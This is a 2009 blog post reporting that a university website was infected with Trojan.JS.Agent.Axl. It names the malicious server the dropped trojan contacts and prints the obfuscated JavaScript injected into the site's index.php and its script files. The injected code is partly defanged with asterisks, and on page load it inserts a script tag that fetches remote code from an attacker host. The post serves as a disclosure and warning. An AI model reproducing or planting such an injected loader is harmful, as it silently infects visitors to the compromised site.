cintaabadi

Search Engine to Find Software and Mp3

Sponsored IMG

Polls

Are You interested in supporting this website by clicking the Google Ads that appear on this website?
 

Newsflash

zoom

All Image is Thumbnail Size

Clik Image for Enlarge In Article

 

logoshareme

Sharing is Caring

angel-of-change-kaskus-ycab

Let's Be Part Of Little Change

Read Here....

Site Search

Supported By







This Site Member of AntiSpam-Crawlers





TopOfBlogs

Free PageRank Checker





Disclaimer

Disclaimer
 
Mercubuana website infected by Trojan.JS.Agent.Axl
User Rating: / 0
PoorBest 
News - it-stuff
Written by mangthjik riche   
Wednesday, 23 December 2009 10:23
AddThis Social Bookmark Button

http://kk.mercubuana.ac.id/new/index.php , when I was open it with firefox, my KIS inform me that site is contain Trojan.JS.Agent.Axl, here the information.

kis_info_trojanjsagentaxl
If you have don’t have antivirus, or your antivirus not recognized this Trojan.
This script will make download the real Trojan trojan-cliker.js.iframe.db which had drooped by help of Trojan.JS.Agent.Axl; Trojan trojan-cliker.js.iframe.db will contact his parent site http://mail-com.hotfile.reuters-com.simpleworldhouse.ru:8080
Of course the real site is simpleworldhouse.ru


Droped trojan in Cached

trojan-cliker.js.iframe.db_droped


Parent Site/ contacted server

parent-sitetrojan trojan-cliker.js.iframe.db-mercubuana


I don’t know what this Trojan do.  The exactly they was a backdoor from your computer to transmit your data,

Back to mercubuana site. When you look close this site. You will find that their index.php and their js has infected by Trojan.JS.Agent.Axl by adding latest script below html code

*********************
/*GNU GPL*/ try{window.onload = f***unction(){var Jks0ui2n781rkgl = document.createElement('script');***Jks0ui2n781rkgl.setAttribute('type',

'text/javascrip***t');Jks0ui2n781rkgl.setAttribute('src', 'h&(t@&(!t)@p)@:##/$)/$&@#m@@$a!(i&@l^@&#-$c^#$o@@!&m#@.!&^##h$$@@o$&t!)f$$(i^)l)#$#e#)!.$!c^)&o&m

(^.#^&r$!e^$$&u)&t#&e@@!)r#)!!&s$#-&&c(o#m!.^)(s^!i&!^m^p(^l@@!e((w()o$@r^(!l)(^d$(h#^o#u^$$s)!e&#&$).@r&)u!#:@(8)&0!(8(0#(/$&$l!)a#&)#t(i&#$)m$e@$@s##).$!c^o(@m)

()/)@)l###(a$!t)^$(i$m(^$e$s$.^$&c@@^o^!#m^&/)$h&^o(&(t&^t$i##@e&))s)***@t(^^a!r&&&.&c!!o#m#@$/^p!^)^r$)^i&!c(&!e!)!m^i##!$n#&i$()s!t@$e$(@@r))

^!.#@$))c^!o)m)#)#/(&!@g@@$o)@^&@o#g(@##l&(e)!!(.#)((c!o@(^m)&$/(!^@'.replace(/\

(|\!|\$|@|\^|\)|&|#/ig, ''));Jks0ui2n781rkgl.setAttribute('defer', 'defer');/document.body.appendChild***(Jks0ui2n781rkgl);}} catch(e) {}
*********************

Capture melar.js which altered by virus added at last line

melar.js had been infected

Capture mmenu.js which altered by virus added at last line

mmmenujs infected my trojan.js.agent.axl

I don't know after this article is written, the malicious code had removed or not from thesite. :)

 



blog comments powered by Disqus

Last Updated on Wednesday, 23 December 2009 17:10